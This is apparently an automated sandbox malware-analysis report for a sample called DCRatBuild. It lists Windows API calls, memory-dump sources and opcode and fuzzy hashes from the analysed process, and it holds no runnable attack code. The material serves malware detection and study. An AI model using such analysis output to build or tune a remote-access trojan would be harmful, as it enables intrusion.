                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0075A4C5
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AddressProc__crt_fast_encode_pointer
                                        • String ID:
                                        • API String ID: 2279764990-0
                                        • Opcode ID: d52721de03346d2c83408783fa2996794e2d402e15b6103daa3a430cbb94a376
                                        • Instruction ID: e70ba8ad61530524b9ac1f4f2cc45fbd311c00ce6826e16eeb9d05d974eb0d18
                                        • Opcode Fuzzy Hash: d52721de03346d2c83408783fa2996794e2d402e15b6103daa3a430cbb94a376
                                        • Instruction Fuzzy Hash: A2110A37A01261AB9F219EACEC448EA73A59B813217168330FD15AB254DAFCDC45C6E2
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00739B35,?,?,00000000,?,?,00738D9C,?), ref: 00739BC0
                                        • GetLastError.KERNEL32 ref: 00739BCD
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: fb26c2ec641b019eab09f1553726d57a4ff9024559d8a568c9a6bb8cdfd1495b
                                        • Instruction ID: b919a6a529508186dea460bd5aeb826476b974343511e741d0f55432409680fa
                                        • Opcode Fuzzy Hash: fb26c2ec641b019eab09f1553726d57a4ff9024559d8a568c9a6bb8cdfd1495b
                                        • Instruction Fuzzy Hash: E20104B2304305DFAB08CE25AC9487EF399AFC1321F10852DFA1387282CAB8DC059A20
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00739E76
                                        • GetLastError.KERNEL32 ref: 00739E82
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 364e8e82aaa36351d41b3f8350a3f0b2ab64609d6e9af071942e8284991bf695
                                        • Instruction ID: a9280d828b052c95f59328c8f873827f0726dd2197753d34302046ae28f61a02
                                        • Opcode Fuzzy Hash: 364e8e82aaa36351d41b3f8350a3f0b2ab64609d6e9af071942e8284991bf695
                                        • Instruction Fuzzy Hash: 520192737043006BFB34DE69DC4876BB6D99B84314F14893EF246C2681DAB9DC488610
                                        APIs
                                        • _free.LIBCMT ref: 00758627
                                          • Part of subcall function 00758518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0075C13D,00000000,?,007567E2,?,00000008,?,007589AD,?,?,?), ref: 0075854A
                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00770F50,0073CE57,?,?,?,?,?,?), ref: 00758663
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Heap$AllocAllocate_free
                                        • String ID:
                                        • API String ID: 2447670028-0
                                        • Opcode ID: ef75d5c690e9677b7c5d72f3f4888350b50f95fca69baa2d55074c2f3f836441
                                        • Instruction ID: fe69648d23952aec9eedc9042ec7169c41b3b77c353f2a50d6d972aad59b5c76
                                        • Opcode Fuzzy Hash: ef75d5c690e9677b7c5d72f3f4888350b50f95fca69baa2d55074c2f3f836441
                                        • Instruction Fuzzy Hash: 9BF0A421501116A7CBE12A21AC04AEF2758DF917A3B188115FC5476192DFECC8099597
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?), ref: 00740915
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 0074091C
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: e6af6cc9862f52773e73c6b915b93a49434e939770c60ed6edd95baa43c6e81c
                                        • Instruction ID: 434f8eb52b6be61196a3dd9cb5c7ebfb27114403a33f7a8280c53cc48ebd4f54
                                        • Opcode Fuzzy Hash: e6af6cc9862f52773e73c6b915b93a49434e939770c60ed6edd95baa43c6e81c
                                        • Instruction Fuzzy Hash: 6CE09232E14209ABEF09CAA49C049BB739DEB08214720817DEA07D3201FB38FE0586E4
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0073A27A,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A458
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0073A27A,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A489
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 89504549d8606f26136202ef62f1b672ddd7562c17cf75c51d156085fd345930
                                        • Instruction ID: 3ba53b608e50f3a28ad6c0283a16c96aa283ebfa2ef9659d993995b2f3cc087b
                                        • Opcode Fuzzy Hash: 89504549d8606f26136202ef62f1b672ddd7562c17cf75c51d156085fd345930
                                        • Instruction Fuzzy Hash: CBF0A03124024DBBEF125F60DC06FD9376DBB04391F048055FC8886162DBBA8AA8EA50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemText_swprintf
                                        • String ID:
                                        • API String ID: 3011073432-0
                                        • Opcode ID: def33ca6269342a0490138656fa09c832d86b96d5a46e0704c6b9a512af8802d
                                        • Instruction ID: 18fba73bf82d22b325c3389f610e8972fe463a88c95092c5ecf3fa3de487175b
                                        • Opcode Fuzzy Hash: def33ca6269342a0490138656fa09c832d86b96d5a46e0704c6b9a512af8802d
                                        • Instruction Fuzzy Hash: 46F0EC7164034CBAEB21AF70DC0EF99375CEB04745F040696B604530A2DF7D6E704762
                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,?,0073984C,?,?,00739688,?,?,?,?,00761FA1,000000FF), ref: 0073A13E
                                        • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0073984C,?,?,00739688,?,?,?,?,00761FA1,000000FF), ref: 0073A16C
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 35ae3c6229f934ba649aa756a44865863b6e123df1fc385683eabb040005e8fc
                                        • Instruction ID: c4ae12c6abdcba8251a3804b83c3269621c6e9bbe7795b121af40d133588081b
                                        • Opcode Fuzzy Hash: 35ae3c6229f934ba649aa756a44865863b6e123df1fc385683eabb040005e8fc
                                        • Instruction Fuzzy Hash: 80E0923564020CBBEB119F70DC46FE9776CBB09381F484065B988C3062DB669D98EA94
                                        APIs
                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00761FA1,000000FF), ref: 0074A3D1
                                        • CoUninitialize.COMBASE(?,?,?,?,00761FA1,000000FF), ref: 0074A3D6
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: GdiplusShutdownUninitialize
                                        • String ID:
                                        • API String ID: 3856339756-0
                                        • Opcode ID: 373e85087c8eb3c428c0c247c2e427c67bf2822fa4c5343a2c56e667f93c27ce
                                        • Instruction ID: a6b4980b502405fbd0c1476a454dda9cce462ae4f23c08390e47b6ba453d3a4a
                                        • Opcode Fuzzy Hash: 373e85087c8eb3c428c0c247c2e427c67bf2822fa4c5343a2c56e667f93c27ce
                                        • Instruction Fuzzy Hash: 07F03072558A54EFC710AB4CDC09B55FBACFB49B20F04836AF41993B60CB786811CA95
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,0073A189,?,007376B2,?,?,?,?), ref: 0073A1A5
                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0073A189,?,007376B2,?,?,?,?), ref: 0073A1D1
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 620745e15bd8317f48770e4670cd774bf65f82cc21507812db67877af2d815f7
                                        • Instruction ID: bbca637d643354c66167b05add106cb947df734513eda975f884038f1daa9826
                                        • Opcode Fuzzy Hash: 620745e15bd8317f48770e4670cd774bf65f82cc21507812db67877af2d815f7
                                        • Instruction Fuzzy Hash: 3EE09B3690011CA7DB21AB64DC05BE5776CAB083F1F004162FD45D3191D7749D449AD0
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007400A0
                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0073EB86,Crypt32.dll,00000000,0073EC0A,?,?,0073EBEC,?,?,?), ref: 007400C2
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystem
                                        • String ID:
                                        • API String ID: 1175261203-0
                                        • Opcode ID: f4dde491d46731541cae6abdba2406609a74d633ad67ee018252aab8d273a4cf
                                        • Instruction ID: ebc7ec87a30497a35b2cae523c51c8816d94ce17b0c950a7ff70384ddd78fb45
                                        • Opcode Fuzzy Hash: f4dde491d46731541cae6abdba2406609a74d633ad67ee018252aab8d273a4cf
                                        • Instruction Fuzzy Hash: 91E0927690021CAADB219BA49C08FD6776CFF0C392F0400A5BA08D3005DBB89A44CBF4
                                        APIs
                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00749B30
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00749B37
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: BitmapCreateFromGdipStream
                                        • String ID:
                                        • API String ID: 1918208029-0
                                        • Opcode ID: b59376c2716ac5b5b1d6c3c3854d23b616723ca5b28d1e8688ce0e7fa0eab3cd
                                        • Instruction ID: 285e8b5fec235e1a0d0bb488204d483fef0f20d66df966f5d3963d752a3443ea
                                        • Opcode Fuzzy Hash: b59376c2716ac5b5b1d6c3c3854d23b616723ca5b28d1e8688ce0e7fa0eab3cd
                                        • Instruction Fuzzy Hash: B4E0ED71901218EBCB20DF98D50569AB7E8FB05321F10805BEC9593600D7B56E14DB91
                                        APIs
                                          • Part of subcall function 0075329A: try_get_function.LIBVCRUNTIME ref: 007532AF
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0075217A
                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00752185
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                        • String ID:
                                        • API String ID: 806969131-0
                                        • Opcode ID: c6a2cb015add8bae06494bd82af6a378c606b878eaa226cf4ddfbcc42091366a
                                        • Instruction ID: c3274e0effb948949c5c9ffc4594eb3dd96dede4c3d0dc37986b0ad180c5ed75
                                        • Opcode Fuzzy Hash: c6a2cb015add8bae06494bd82af6a378c606b878eaa226cf4ddfbcc42091366a
                                        • Instruction Fuzzy Hash: C0D0A765504B0AA43C4436B42C5A0DB13445853BB33E00645EE20850E3EEDD444F6022
                                        APIs
                                        • DloadLock.DELAYIMP ref: 0074DC73
                                        • DloadProtectSection.DELAYIMP ref: 0074DC8F
                                          • Part of subcall function 0074DE67: DloadObtainSection.DELAYIMP ref: 0074DE77
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Dload$Section$LockObtainProtect
                                        • String ID:
                                        • API String ID: 731663317-0
                                        APIs
                                        Similarity
                                        • API ID: ItemShowWindow
                                        • String ID:
                                        • API String ID: 3351165006-0
                                        APIs
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00738384
                                          • Part of subcall function 00731380: __EH_prolog.LIBCMT ref: 00731385
                                          • Part of subcall function 00731380: new.LIBCMT ref: 007313FE
                                          • Part of subcall function 007319A6: __EH_prolog.LIBCMT ref: 007319AB
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00731E05
                                          • Part of subcall function 00733B3D: __EH_prolog.LIBCMT ref: 00733B42
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0074A7C8
                                          • Part of subcall function 00731380: __EH_prolog.LIBCMT ref: 00731385
                                          • Part of subcall function 00731380: new.LIBCMT ref: 007313FE
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00735BDC
                                          • Part of subcall function 0073B07D: __EH_prolog.LIBCMT ref: 0073B082
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0075C13D,00000000,?,007567E2,?,00000008,?,007589AD,?,?,?), ref: 0075854A
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        APIs
                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0073A4F5
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        APIs
                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 007406B1
                                        Similarity
                                        • API ID: ExecutionStateThread
                                        • String ID:
                                        • API String ID: 2211380416-0
                                        APIs
                                        • GdipAlloc.GDIPLUS(00000010), ref: 00749D81
                                          • Part of subcall function 00749B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00749B30
                                        Similarity
                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 1915507550-0
                                        APIs
                                        • GetFileType.KERNELBASE(000000FF,00739887), ref: 00739995
                                        Similarity
                                        • API ID: FileType
                                        • String ID:
                                        • API String ID: 3081899298-0
                                        • Opcode ID: 64389340b99d969b7f8afa7798c394b8a208b1f23822a51b78ab335c5253c7ce
                                        • Instruction ID: 9ca8335315ad71773dae01059842e391fad45cabf79c6cda36ccdf11a1162f0d
                                        • Opcode Fuzzy Hash: 64389340b99d969b7f8afa7798c394b8a208b1f23822a51b78ab335c5253c7ce
                                        • Instruction Fuzzy Hash: D7D01231411241959F6146348D092997752DBC3366F38C6E8D165C40A2D76BD803F541
                                        APIs
                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0074D43F
                                          • Part of subcall function 0074AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0074AC85
                                          • Part of subcall function 0074AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0074AC96
                                          • Part of subcall function 0074AC74: IsDialogMessageW.USER32(00050160,?), ref: 0074ACAA
                                          • Part of subcall function 0074AC74: TranslateMessage.USER32(?), ref: 0074ACB8
                                          • Part of subcall function 0074AC74: DispatchMessageW.USER32(?), ref: 0074ACC2
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                        • String ID:
                                        • API String ID: 897784432-0
                                        • Opcode ID: ad602ddd1e3f4878beb5423f639ad9ef6675320bf5814bfab6f86ab837feb530
                                        • Instruction ID: 0aac2db012b505d7f21c342cc0ed322130c99f5bc92abf2646e4ca92af9f3dcd
                                        • Opcode Fuzzy Hash: ad602ddd1e3f4878beb5423f639ad9ef6675320bf5814bfab6f86ab837feb530
                                        • Instruction Fuzzy Hash: 85D09E31184300BBD6112B51CE0AF0F7AA6AB98B04F008654B348740B286669D319B1A
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 44124e1470477514160a477bf2ade8fae032117799a2687b3b4e02df8b283e11
                                        • Instruction ID: 2e2b03241078d09004974d9c2a1da5ba66a6d1176c103777c6dec6b9e720a25a
                                        • Opcode Fuzzy Hash: 44124e1470477514160a477bf2ade8fae032117799a2687b3b4e02df8b283e11
                                        • Instruction Fuzzy Hash: 1AB012E13AC001BC322C71047D16D36020CC4C3B10330402AB48ED40C2E74C6E4E0831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
